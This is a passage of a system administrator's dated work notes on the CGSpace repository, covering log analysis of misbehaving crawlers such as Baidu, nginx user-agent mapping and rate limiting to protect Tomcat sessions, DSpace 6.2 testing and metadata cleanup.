+</code></pre><ul>
+<li>The next IP (157.55.39.161) also seems to be bingbot, and none of its requests are for URLs forbidden by robots.txt either:</li>
+</ul>
+<pre tabindex="0"><code># grep 157.55.39.161 /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
+0
+</code></pre><ul>
+<li>The next few seem to be bingbot as well, and they declare a proper user agent and do not request dynamic URLs like &ldquo;/discover&rdquo;:</li>
+</ul>
+<pre tabindex="0"><code># grep -c -E &#39;207.46.13.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 
+5997
+# grep -E &#39;207.46.13.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;bingbot&#34;
+5988
+# grep -E &#39;207.46.13.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
+0
+</code></pre><ul>
+<li>The next few seem to be Googlebot, and they declare a proper user agent and do not request dynamic URLs like &ldquo;/discover&rdquo;:</li>
+</ul>
+<pre tabindex="0"><code># grep -c -E &#39;66.249.66.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 
+3048
+# grep -E &#39;66.249.66.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c Google
+3048
+# grep -E &#39;66.249.66.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
+0
+</code></pre><ul>
+<li>The next seems to be Yahoo, which declares a proper user agent and does not request dynamic URLs like &ldquo;/discover&rdquo;:</li>
+</ul>
+<pre tabindex="0"><code># grep -c 68.180.229.254 /var/log/nginx/access.log.1 
+1131
+# grep  68.180.229.254 /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
+0
+</code></pre><ul>
+<li>The last of the top ten IPs seems to be some bot with a weird user agent, but they are not behaving too well:</li>
+</ul>
+<pre tabindex="0"><code># grep -c -E &#39;65.49.68.[0-9]{3}&#39; /var/log/nginx/access.log.1 
+2950
+# grep -E &#39;65.49.68.[0-9]{3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
+330
+</code></pre><ul>
+<li>Their user agents vary, ie:
+<ul>
+<li><code>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36</code></li>
+<li><code>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11</code></li>
+<li><code>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)</code></li>
+</ul>
+</li>
+<li>I&rsquo;ll just keep an eye on that one for now, as it only made a few hundred requests to dynamic discovery URLs</li>
+<li>While it&rsquo;s not in the top ten, Baidu is one bot that seems to not give a fuck:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;7/Nov/2017&#34; | grep -c Baiduspider
+8912
+# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;7/Nov/2017&#34; | grep Baiduspider | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
+2521
+</code></pre><ul>
+<li>According to their documentation their bot <a href="http://www.baidu.com/search/robots_english.html">respects <code>robots.txt</code></a>, but I don&rsquo;t see this being the case</li>
+<li>I think I will end up blocking Baidu as well&hellip;</li>
+<li>Next is for me to look and see what was happening specifically at 3AM and 7AM when the server crashed</li>
+<li>I should look in nginx access.log, rest.log, oai.log, and DSpace&rsquo;s dspace.log.2017-11-07</li>
+<li>Here are the top IPs making requests to XMLUI from 2 to 8 AM:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;07/Nov/2017:0[2-8]&#39; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    279 66.249.66.91
+    373 65.49.68.199
+    446 68.180.229.254
+    470 104.196.152.243
+    470 197.210.168.174
+    598 207.46.13.103
+    603 157.55.39.161
+    637 207.46.13.80
+    703 207.46.13.36
+    724 66.249.66.90
+</code></pre><ul>
+<li>Of those, most are Google, Bing, Yahoo, etc, except 63.143.42.244 and 63.143.42.242 which are Uptime Robot</li>
+<li>Here are the top IPs making requests to REST from 2 to 8 AM:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#39;07/Nov/2017:0[2-8]&#39; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+      8 207.241.229.237
+     10 66.249.66.90
+     16 104.196.152.243
+     25 41.60.238.61
+     26 157.55.39.161
+     27 207.46.13.103
+     27 207.46.13.80
+     31 207.46.13.36
+   1498 50.116.102.77
+</code></pre><ul>
+<li>The OAI requests during that same time period are nothing to worry about:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#39;07/Nov/2017:0[2-8]&#39; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+      1 66.249.66.92
+      4 66.249.66.90
+      6 68.180.229.254
+</code></pre><ul>
+<li>The top IPs from dspace.log during the 2–8 AM period:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -E &#39;2017-11-07 0[2-8]&#39; dspace.log.2017-11-07 | grep -o -E &#39;ip_addr=[0-9.]+&#39; | sort -n | uniq -c | sort -h | tail
+    143 ip_addr=213.55.99.121
+    181 ip_addr=66.249.66.91
+    223 ip_addr=157.55.39.161
+    248 ip_addr=207.46.13.80
+    251 ip_addr=207.46.13.103
+    291 ip_addr=207.46.13.36
+    297 ip_addr=197.210.168.174
+    312 ip_addr=65.49.68.199
+    462 ip_addr=104.196.152.243
+    488 ip_addr=66.249.66.90
+</code></pre><ul>
+<li>These aren&rsquo;t actually very interesting, as the top few are Google, CIAT, Bingbot, and a few other unknown scrapers</li>
+<li>The number of requests isn&rsquo;t even that high to be honest</li>
+<li>As I was looking at these logs I noticed another heavy user (124.17.34.59) that was not active during this time period, but made many requests today alone:</li>
+</ul>
+<pre tabindex="0"><code># zgrep -c 124.17.34.59 /var/log/nginx/access.log*
+/var/log/nginx/access.log:22581
+/var/log/nginx/access.log.1:0
+/var/log/nginx/access.log.2.gz:14
+/var/log/nginx/access.log.3.gz:0
+/var/log/nginx/access.log.4.gz:0
+/var/log/nginx/access.log.5.gz:3
+/var/log/nginx/access.log.6.gz:0
+/var/log/nginx/access.log.7.gz:0
+/var/log/nginx/access.log.8.gz:0
+/var/log/nginx/access.log.9.gz:1
+</code></pre><ul>
+<li>The whois data shows the IP is from China, but the user agent doesn&rsquo;t really give any clues:</li>
+</ul>
+<pre tabindex="0"><code># grep 124.17.34.59 /var/log/nginx/access.log | awk -F&#39;&#34; &#39; &#39;{print $3}&#39; | sort | uniq -c | sort -h
+    210 &#34;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36&#34;
+  22610 &#34;Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)&#34;
+</code></pre><ul>
+<li>A Google search for &ldquo;LCTE bot&rdquo; doesn&rsquo;t return anything interesting, but this <a href="https://stackoverflow.com/questions/42500881/what-is-lcte-in-user-agent">Stack Overflow discussion</a> references the lack of information</li>
+<li>So basically after a few hours of looking at the log files I am not closer to understanding what is going on!</li>
+<li>I do know that we want to block Baidu, though, as it does not respect <code>robots.txt</code></li>
+<li>And as we speak Linode alerted that the outbound traffic rate is very high for the past two hours (about 12–14 hours)</li>
+<li>At least for now it seems to be that new Chinese IP (124.17.34.59):</li>
+</ul>
+<pre tabindex="0"><code># grep -E &#34;07/Nov/2017:1[234]:&#34; /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    198 207.46.13.103
+    203 207.46.13.80
+    205 207.46.13.36
+    218 157.55.39.161
+    249 45.5.184.221
+    258 45.5.187.130
+    386 66.249.66.90
+    410 197.210.168.174
+   1896 104.196.152.243
+  11005 124.17.34.59
+</code></pre><ul>
+<li>Seems 124.17.34.59 are really downloading all our PDFs, compared to the next top active IPs during this time!</li>
+</ul>
+<pre tabindex="0"><code># grep -E &#34;07/Nov/2017:1[234]:&#34; /var/log/nginx/access.log | grep 124.17.34.59 | grep -c pdf
+5948
+# grep -E &#34;07/Nov/2017:1[234]:&#34; /var/log/nginx/access.log | grep 104.196.152.243 | grep -c pdf
+0
+</code></pre><ul>
+<li>About CIAT, I think I need to encourage them to specify a user agent string for their requests, because they are not reuising their Tomcat session and they are creating thousands of sessions per day</li>
+<li>All CIAT requests vs unique ones:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -Io -E &#39;session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243&#39; dspace.log.2017-11-07 | wc -l
+3506
+$ grep -Io -E &#39;session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243&#39; dspace.log.2017-11-07 | sort | uniq | wc -l
+3506
+</code></pre><ul>
+<li>I emailed CIAT about the session issue, user agent issue, and told them they should not scrape the HTML contents of communities, instead using the REST API</li>
+<li>About Baidu, I found a link to their <a href="http://ziyuan.baidu.com/robots/">robots.txt tester tool</a></li>
+<li>It seems like our robots.txt file is valid, and they claim to recognize that URLs like <code>/discover</code> should be forbidden (不允许, aka &ldquo;not allowed&rdquo;):</li>
+</ul>
+<p><img src="/cgspace-notes/2017/11/baidu-robotstxt.png" alt="Baidu robots.txt tester"></p>
+<ul>
+<li>But they literally just made this request today:</li>
+</ul>
+<pre tabindex="0"><code>180.76.15.136 - - [07/Nov/2017:06:25:11 +0000] &#34;GET /discover?filtertype_0=crpsubject&amp;filter_relational_operator_0=equals&amp;filter_0=WATER%2C+LAND+AND+ECOSYSTEMS&amp;filtertype=subject&amp;filter_relational_operator=equals&amp;filter=WATER+RESOURCES HTTP/1.1&#34; 200 82265 &#34;-&#34; &#34;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#34;
+</code></pre><ul>
+<li>Along with another thousand or so requests to URLs that are forbidden in robots.txt today alone:</li>
+</ul>
+<pre tabindex="0"><code># grep -c Baiduspider /var/log/nginx/access.log
+3806
+# grep Baiduspider /var/log/nginx/access.log | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
+1085
+</code></pre><ul>
+<li>I will think about blocking their IPs but they have 164 of them!</li>
+</ul>
+<pre tabindex="0"><code># grep &#34;Baiduspider/2.0&#34; /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort -n | uniq | wc -l
+164
+</code></pre><h2 id="2017-11-08">2017-11-08</h2>
+<ul>
+<li>Linode sent several alerts last night about CPU usage and outbound traffic rate at 6:13PM</li>
+<li>Linode sent another alert about CPU usage in the morning at 6:12AM</li>
+<li>Jesus, the new Chinese IP (124.17.34.59) has downloaded 24,000 PDFs in the last 24 hours:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;0[78]/Nov/2017:&#34; | grep 124.17.34.59 | grep -v pdf.jpg | grep -c pdf
+24981
+</code></pre><ul>
+<li>This is about 20,000 Tomcat sessions:</li>
+</ul>
+<pre tabindex="0"><code>$ cat dspace.log.2017-11-07 dspace.log.2017-11-08 | grep -Io -E &#39;session_id=[A-Z0-9]{32}:ip_addr=124.17.34.59&#39; | sort | uniq | wc -l
+20733
+</code></pre><ul>
+<li>I&rsquo;m getting really sick of this</li>
+<li>Sisay re-uploaded the CIAT records that I had already corrected earlier this week, erasing all my corrections</li>
+<li>I had to re-correct all the publishers, places, names, dates, etc and apply the changes on DSpace Test</li>
+<li>Run system updates on DSpace Test and reboot the server</li>
+<li>Magdalena had written to say that two of their Phase II project tags were missing on CGSpace, so I added them (<a href="https://github.com/ilri/DSpace/pull/346">#346</a>)</li>
+<li>I figured out a way to use nginx&rsquo;s map function to assign a &ldquo;bot&rdquo; user agent to misbehaving clients who don&rsquo;t define a user agent</li>
+<li>Most bots are automatically lumped into one generic session by <a href="https://tomcat.apache.org/tomcat-7.0-doc/config/valve.html#Crawler_Session_Manager_Valve">Tomcat&rsquo;s Crawler Session Manager Valve</a> but this only works if their user agent matches a pre-defined regular expression like <code>.*[bB]ot.*</code></li>
+<li>Some clients send thousands of requests without a user agent which ends up creating thousands of Tomcat sessions, wasting precious memory, CPU, and database resources in the process</li>
+<li>Basically, we modify the nginx config to add a mapping with a modified user agent <code>$ua</code>:</li>
+</ul>
+<pre tabindex="0"><code>map $remote_addr $ua {
+    # 2017-11-08 Random Chinese host grabbing 20,000 PDFs
+    124.17.34.59     &#39;ChineseBot&#39;;
+    default          $http_user_agent;
+}
+</code></pre><ul>
+<li>If the client&rsquo;s address matches then the user agent is set, otherwise the default <code>$http_user_agent</code> variable is used</li>
+<li>Then, in the server&rsquo;s <code>/</code> block we pass this header to Tomcat:</li>
+</ul>
+<pre tabindex="0"><code>proxy_pass http://tomcat_http;
+proxy_set_header User-Agent $ua;
+</code></pre><ul>
+<li>Note to self: the <code>$ua</code> variable won&rsquo;t show up in nginx access logs because the default <code>combined</code> log format doesn&rsquo;t show it, so don&rsquo;t run around pulling your hair out wondering with the modified user agents aren&rsquo;t showing in the logs!</li>
+<li>If a client matching one of these IPs connects without a session, it will be assigned one by the Crawler Session Manager Valve</li>
+<li>You can verify by cross referencing nginx&rsquo;s <code>access.log</code> and DSpace&rsquo;s <code>dspace.log.2017-11-08</code>, for example</li>
+<li>I will deploy this on CGSpace later this week</li>
+<li>I am interested to check how this affects the number of sessions used by the CIAT and Chinese bots (see above on <a href="#2017-11-07">2017-11-07</a> for example)</li>
+<li>I merged the clickable thumbnails code to <code>5_x-prod</code> (<a href="https://github.com/ilri/DSpace/pull/347">#347</a>) and will deploy it later along with the new bot mapping stuff (and re-run the Asible <code>nginx</code> and <code>tomcat</code> tags)</li>
+<li>I was thinking about Baidu again and decided to see how many requests they have versus Google to URL paths that are explicitly forbidden in <code>robots.txt</code>:</li>
+</ul>
+<pre tabindex="0"><code># zgrep Baiduspider /var/log/nginx/access.log* | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
+22229
+# zgrep Googlebot /var/log/nginx/access.log* | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
+0
+</code></pre><ul>
+<li>It seems that they rarely even bother checking <code>robots.txt</code>, but Google does multiple times per day!</li>
+</ul>
+<pre tabindex="0"><code># zgrep Baiduspider /var/log/nginx/access.log* | grep -c robots.txt
+14
+# zgrep Googlebot  /var/log/nginx/access.log* | grep -c robots.txt
+1134
+</code></pre><ul>
+<li>I have been looking for a reason to ban Baidu and this is definitely a good one</li>
+<li>Disallowing <code>Baiduspider</code> in <code>robots.txt</code> probably won&rsquo;t work because this bot doesn&rsquo;t seem to respect the robot exclusion standard anyways!</li>
+<li>I will whip up something in nginx later</li>
+<li>Run system updates on CGSpace and reboot the server</li>
+<li>Re-deploy latest <code>5_x-prod</code> branch on CGSpace and DSpace Test (includes the clickable thumbnails, CCAFS phase II project tags, and updated news text)</li>
+</ul>
+<h2 id="2017-11-09">2017-11-09</h2>
+<ul>
+<li>Awesome, it seems my bot mapping stuff in nginx actually reduced the number of Tomcat sessions used by the CIAT scraper today, total requests and unique sessions:</li>
+</ul>
+<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#39;09/Nov/2017&#39; | grep -c 104.196.152.243
+8956
+$ grep 104.196.152.243 dspace.log.2017-11-09 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+223
+</code></pre><ul>
+<li>Versus the same stats for yesterday and the day before:</li>
+</ul>
+<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#39;08/Nov/2017&#39; | grep -c 104.196.152.243 
+10216
+$ grep 104.196.152.243 dspace.log.2017-11-08 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+2592
+# zcat -f -- /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep &#39;07/Nov/2017&#39; | grep -c 104.196.152.243
+8120
+$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+3506
+</code></pre><ul>
+<li>The number of sessions is over <em>ten times less</em>!</li>
+<li>This gets me thinking, I wonder if I can use something like nginx&rsquo;s rate limiter to automatically change the user agent of clients who make too many requests</li>
+<li>Perhaps using a combination of geo and map, like illustrated here: <a href="https://www.nginx.com/blog/rate-limiting-nginx/">https://www.nginx.com/blog/rate-limiting-nginx/</a></li>
+</ul>
+<h2 id="2017-11-11">2017-11-11</h2>
+<ul>
+<li>I was looking at the Google index and noticed there are 4,090 search results for dspace.ilri.org but only seven for mahider.ilri.org</li>
+<li>Search with something like: inurl:dspace.ilri.org inurl:https</li>
+<li>I want to get rid of those legacy domains eventually!</li>
+</ul>
+<h2 id="2017-11-12">2017-11-12</h2>
+<ul>
+<li>Update the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure templates</a> to be a little more modular and flexible</li>
+<li>Looking at the top client IPs on CGSpace so far this morning, even though it&rsquo;s only been eight hours:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;12/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    243 5.83.120.111
+    335 40.77.167.103
+    424 66.249.66.91
+    529 207.46.13.36
+    554 40.77.167.129
+    604 207.46.13.53
+    754 104.196.152.243
+    883 66.249.66.90
+   1150 95.108.181.88
+   1381 5.9.6.51
+</code></pre><ul>
+<li>5.9.6.51 seems to be a Russian bot:</li>
+</ul>
+<pre tabindex="0"><code># grep 5.9.6.51 /var/log/nginx/access.log | tail -n 1
+5.9.6.51 - - [12/Nov/2017:08:13:13 +0000] &#34;GET /handle/10568/16515/recent-submissions HTTP/1.1&#34; 200 5097 &#34;-&#34; &#34;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&#34;
+</code></pre><ul>
+<li>What&rsquo;s amazing is that it seems to reuse its Java session across all requests:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2017-11-12
+1558
+$ grep 5.9.6.51 dspace.log.2017-11-12 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+1
+</code></pre><ul>
+<li>Bravo to MegaIndex.ru!</li>
+<li>The same cannot be said for 95.108.181.88, which appears to be YandexBot, even though Tomcat&rsquo;s Crawler Session Manager valve regex should match &lsquo;YandexBot&rsquo;:</li>
+</ul>
+<pre tabindex="0"><code># grep 95.108.181.88 /var/log/nginx/access.log | tail -n 1
+95.108.181.88 - - [12/Nov/2017:08:33:17 +0000] &#34;GET /bitstream/handle/10568/57004/GenebankColombia_23Feb2015.pdf HTTP/1.1&#34; 200 972019 &#34;-&#34; &#34;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#34;
+$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88&#39; dspace.log.2017-11-12
+991
+</code></pre><ul>
+<li>Move some items and collections on CGSpace for Peter Ballantyne, running <a href="https://gist.github.com/alanorth/e60b530ed4989df0c731afbb0c640515"><code>move_collections.sh</code></a> with the following configuration:</li>
+</ul>
+<pre tabindex="0"><code>10947/6    10947/1 10568/83389
+10947/34   10947/1 10568/83389
+10947/2512 10947/1 10568/83389
+</code></pre><ul>
+<li>I explored nginx rate limits as a way to aggressively throttle Baidu bot which doesn&rsquo;t seem to respect disallowed URLs in robots.txt</li>
+<li>There&rsquo;s an interesting <a href="https://www.nginx.com/blog/rate-limiting-nginx/">blog post from Nginx&rsquo;s team about rate limiting</a> as well as a <a href="https://gist.github.com/arosenhagen/8aaf5d7f94171778c0e9">clever use of mapping with rate limits</a></li>
+<li>The solution <a href="https://github.com/ilri/rmg-ansible-public/commit/f0646991772660c505bea9c5ac586490e7c86156">I came up with</a> uses tricks from both of those</li>
+<li>I deployed the limit on CGSpace and DSpace Test and it seems to work well:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:&#39;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#39;
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Encoding: gzip
+Content-Language: en-US
+Content-Type: text/html;charset=utf-8
+Date: Sun, 12 Nov 2017 16:30:19 GMT
+Server: nginx
+Strict-Transport-Security: max-age=15768000
+Transfer-Encoding: chunked
+Vary: Accept-Encoding
+X-Cocoon-Version: 2.2.0
+X-Content-Type-Options: nosniff
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:&#39;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#39;
+HTTP/1.1 503 Service Temporarily Unavailable
+Connection: keep-alive
+Content-Length: 206
+Content-Type: text/html
+Date: Sun, 12 Nov 2017 16:30:21 GMT
+Server: nginx
+</code></pre><ul>
+<li>The first request works, second is denied with an HTTP 503!</li>
+<li>I need to remember to check the Munin graphs for PostgreSQL and JVM next week to see how this affects them</li>
+</ul>
+<h2 id="2017-11-13">2017-11-13</h2>
+<ul>
+<li>At the end of the day I checked the logs and it really looks like the Baidu rate limiting is working, HTTP 200 vs 503:</li>
+</ul>
+<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;13/Nov/2017&#34; | grep &#34;Baiduspider&#34; | grep -c &#34; 200 &#34;
+1132
+# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;13/Nov/2017&#34; | grep &#34;Baiduspider&#34; | grep -c &#34; 503 &#34;
+10105
+</code></pre><ul>
+<li>Helping Sisay proof 47 records for IITA: <a href="https://dspacetest.cgiar.org/handle/10568/97029">https://dspacetest.cgiar.org/handle/10568/97029</a></li>
+<li>From looking at the data in OpenRefine I found:
+<ul>
+<li>Errors in <code>cg.authorship.types</code></li>
+<li>Errors in <code>cg.coverage.country</code> (smart quote in &ldquo;COTE D’IVOIRE&rdquo;, &ldquo;HAWAII&rdquo; is not a country)</li>
+<li>Whitespace issues in some <code>cg.contributor.affiliation</code></li>
+<li>Whitespace issues in some <code>cg.identifier.doi</code> fields and most values are using HTTP instead of HTTPS</li>
+<li>Whitespace issues in some <code>dc.contributor.author</code> fields</li>
+<li>Issue with invalid <code>dc.date.issued</code> value &ldquo;2011-3&rdquo;</li>
+<li>Description fields are poorly copy–pasted</li>
+<li>Whitespace issues in <code>dc.description.sponsorship</code></li>
+<li>Lots of inconsistency in <code>dc.format.extent</code> (mixed dash style, periods at the end of values)</li>
+<li>Whitespace errors in <code>dc.identifier.citation</code></li>
+<li>Whitespace errors in <code>dc.subject</code></li>
+<li>Whitespace errors in <code>dc.title</code></li>
+</ul>
+</li>
+<li>After uploading and looking at the data in DSpace Test I saw more errors with CRPs, subjects (one item had four copies of all of its subjects, another had a &ldquo;.&rdquo; in it), affiliations, sponsors, etc.</li>
+<li>Atmire responded to the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=510">ticket about ORCID stuff</a> a few days ago, today I told them that I need to talk to Peter and the partners to see what we would like to do</li>
+</ul>
+<h2 id="2017-11-14">2017-11-14</h2>
+<ul>
+<li>Deploy some nginx configuration updates to CGSpace</li>
+<li>They had been waiting on a branch for a few months and I think I just forgot about them</li>
+<li>I have been running them on DSpace Test for a few days and haven&rsquo;t seen any issues there</li>
+<li>Started testing DSpace 6.2 and a few things have changed</li>
+<li>Now PostgreSQL needs <code>pgcrypto</code>:</li>
+</ul>
+<pre tabindex="0"><code>$ psql dspace6
+dspace6=# CREATE EXTENSION pgcrypto;
+</code></pre><ul>
+<li>Also, local settings are no longer in <code>build.properties</code>, they are now in <code>local.cfg</code></li>
+<li>I&rsquo;m not sure if we can use separate profiles like we did before with <code>mvn -Denv=blah</code> to use blah.properties</li>
+<li>It seems we need to use &ldquo;system properties&rdquo; to override settings, ie: <code>-Ddspace.dir=/Users/aorth/dspace6</code></li>
+</ul>
+<h2 id="2017-11-15">2017-11-15</h2>
+<ul>
+<li>Send Adam Hunt an invite to the DSpace Developers network on Yammer</li>
+<li>He is the new head of communications at WLE, since Michael left</li>
+<li>Merge changes to item view&rsquo;s wording of link metadata (<a href="https://github.com/ilri/DSpace/pull/348">#348</a>)</li>
+</ul>
+<h2 id="2017-11-17">2017-11-17</h2>
+<ul>
+<li>Uptime Robot said that CGSpace went down today and I see lots of <code>Timeout waiting for idle object</code> errors in the DSpace logs</li>
+<li>I looked in PostgreSQL using <code>SELECT * FROM pg_stat_activity;</code> and saw that there were 73 active connections</li>
+<li>After a few minutes the connecitons went down to 44 and CGSpace was kinda back up, it seems like Tsega restarted Tomcat</li>
+<li>Looking at the REST and XMLUI log files, I don&rsquo;t see anything too crazy:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep &#34;17/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+     13 66.249.66.223
+     14 207.46.13.36
+     17 207.46.13.137
+     22 207.46.13.23
+     23 66.249.66.221
+     92 66.249.66.219
+    187 104.196.152.243
+   1400 70.32.83.92
+   1503 50.116.102.77
+   6037 45.5.184.196
+# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;17/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    325 139.162.247.24
+    354 66.249.66.223
+    422 207.46.13.36
+    434 207.46.13.23
+    501 207.46.13.137
+    647 66.249.66.221
+    662 34.192.116.178
+    762 213.55.99.121
+   1867 104.196.152.243
+   2020 66.249.66.219
+</code></pre><ul>
+<li>I need to look into using JMX to analyze active sessions I think, rather than looking at log files</li>
+<li>After adding appropriate <a href="https://geekflare.com/enable-jmx-tomcat-to-monitor-administer/">JMX listener options to Tomcat&rsquo;s JAVA_OPTS</a> and restarting Tomcat, I can connect remotely using an SSH dynamic port forward (SOCKS) on port 7777 for example, and then start jconsole locally like:</li>
+</ul>
+<pre tabindex="0"><code>$ jconsole -J-DsocksProxyHost=localhost -J-DsocksProxyPort=7777 service:jmx:rmi:///jndi/rmi://localhost:9000/jmxrmi -J-DsocksNonProxyHosts=
+</code></pre><ul>
+<li>Looking at the MBeans you can drill down in Catalina→Manager→webapp→localhost→Attributes and see active sessions, etc</li>
+<li>I want to enable JMX listener on CGSpace but I need to do some more testing on DSpace Test and see if it causes any performance impact, for example</li>
+<li>If I hit the server with some requests as a normal user I see the session counter increase, but if I specify a bot user agent then the sessions seem to be reused (meaning the Crawler Session Manager is working)</li>
+<li>Here is the Jconsole screen after looping <code>http --print Hh https://dspacetest.cgiar.org/handle/10568/1</code> for a few minutes:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/11/jconsole-sessions.png" alt="Jconsole sessions for XMLUI"></p>
+<ul>
+<li>Switch DSpace Test to using the G1GC for JVM so I can see what the JVM graph looks like eventually, and start evaluating it for production</li>
+</ul>
+<h2 id="2017-11-19">2017-11-19</h2>
+<ul>
+<li>Linode sent an alert that CGSpace was using a lot of CPU around 4–6 AM</li>
+<li>Looking in the nginx access logs I see the most active XMLUI users between 4 and 6 AM:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;19/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    111 66.249.66.155
+    171 5.9.6.51
+    188 54.162.241.40
+    229 207.46.13.23
+    233 207.46.13.137
+    247 40.77.167.6
+    251 207.46.13.36
+    275 68.180.229.254
+    325 104.196.152.243
+   1610 66.249.66.153
+</code></pre><ul>
+<li>66.249.66.153 appears to be Googlebot:</li>
+</ul>
+<pre tabindex="0"><code>66.249.66.153 - - [19/Nov/2017:06:26:01 +0000] &#34;GET /handle/10568/2203 HTTP/1.1&#34; 200 6309 &#34;-&#34; &#34;Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#34;
+</code></pre><ul>
+<li>We know Googlebot is persistent but behaves well, so I guess it was just a coincidence that it came at a time when we had other traffic and server activity</li>
+<li>In related news, I see an Atmire update process going for many hours and responsible for hundreds of thousands of log entries (two thirds of all log entries)</li>
+</ul>
+<pre tabindex="0"><code>$ wc -l dspace.log.2017-11-19 
+388472 dspace.log.2017-11-19
+$ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19 
+267494
+</code></pre><ul>
+<li>WTF is this process doing every day, and for so many hours?</li>
+<li>In unrelated news, when I was looking at the DSpace logs I saw a bunch of errors like this:</li>
+</ul>
+<pre tabindex="0"><code>2017-11-19 03:00:32,806 INFO  org.apache.pdfbox.pdfparser.PDFParser @ Document is encrypted
+2017-11-19 03:00:32,807 ERROR org.apache.pdfbox.filter.FlateFilter @ FlateFilter: stop reading corrupt stream due to a DataFormatException
+</code></pre><ul>
+<li>It&rsquo;s been a few days since I enabled the G1GC on DSpace Test and the JVM graph definitely changed:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/11/tomcat-jvm-g1gc.png" alt="Tomcat G1GC"></p>
